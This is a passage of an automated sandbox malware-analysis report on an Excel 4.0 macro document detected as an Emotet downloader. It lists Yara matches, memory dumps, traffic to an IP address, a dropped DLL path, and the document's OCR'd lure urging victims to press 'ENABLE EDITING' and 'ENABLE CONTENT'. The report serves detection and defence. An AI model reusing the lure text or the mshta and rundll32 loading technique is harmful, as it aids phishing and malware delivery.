                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: mshta.exe, 00000004.00000002.434924168.00000000002FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000002.434924168.00000000002FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_1001B43F
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                            E-Banking Fraud

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 17.2.rundll32.exe.330000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.28f0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2890000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2810000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2280000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3060000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2340000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2860000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3e0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2280000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2170000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.420000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.460000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2830000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.330000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e10000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27a0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3150000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.23f0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e00000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2080000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.28a0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.440000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.26d0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.6c0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.31c0000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.26b0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.630000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2840000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3190000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2870000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.28c0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2160000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4f0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2740000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.460000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.4f0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2860000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2340000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.26d0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2950000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.470000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2890000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2810000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3030000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.23c0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.4f0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2dc0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4f0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.28f0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2950000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2740000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.23f0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.4c0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3160000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e10000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.660000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2870000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2080000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2490000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.630000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ed0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.27c0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e00000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3190000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2890000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2700000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2170000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564937807.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672206410.00000000004C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672542934.00000000023C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675105738.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.509691983.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672233162.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.671351696.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614263255.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.671971939.00000000003E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514065714.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613086830.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672276729.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614545776.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510373196.0000000002890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510260153.0000000002740000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613891474.0000000002170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613342038.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565506727.00000000027A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.567895594.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675067684.0000000003190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614325624.0000000002950000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614438771.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510667014.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565439888.0000000002701000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510425143.00000000028C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565551248.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565698294.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510010458.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.509922920.0000000002080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514698978.0000000000471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510517753.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510176839.00000000026B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568150198.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672589404.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613442141.00000000006C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675028637.0000000003161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613971338.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565128790.0000000000661000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565466027.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614142809.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.674472849.0000000002891000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672492274.0000000002340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614372731.0000000002DC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565096650.0000000000630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613198246.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675215559.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.450462581.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510060149.0000000002161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.617473555.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.617627799.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510140052.0000000002280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.671797398.0000000000330000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510293000.00000000027C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564986915.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565627998.00000000028A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.509954832.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.616810767.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.674563401.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614197032.0000000002831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568578862.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565801844.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.671423407.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565866582.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614228489.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565599896.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\QWER.dll, type: DROPPED

                            System Summary

                            barindex
                            Found malicious Excel 4.0 Macro
                            Source: 80_513972285.xlsMacro extractor: Sheet: Macro1 contains: mshta
                            Source: 80_513972285.xlsMacro extractor: Sheet: Macro1 contains: mshta
                            Malicious sample detected (through community Yara rule)
                            Source: 80_513972285.xls, type: SAMPLEMatched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
                            Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPEDMatched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
                            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                            Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
                            Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
                            Source: Screenshot number: 4Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 G
                            Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 :: Previewing is not available for protected documents. 14 15 Yo
                            Source: Screenshot number: 8Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 G) I I 23 24 25 26
                            Document contains OLE streams with names of living off the land binaries
                            Source: 80_513972285.xlsStream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
                            Source: 80_513972285.xls.0.drStream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
                            Powershell drops PE file
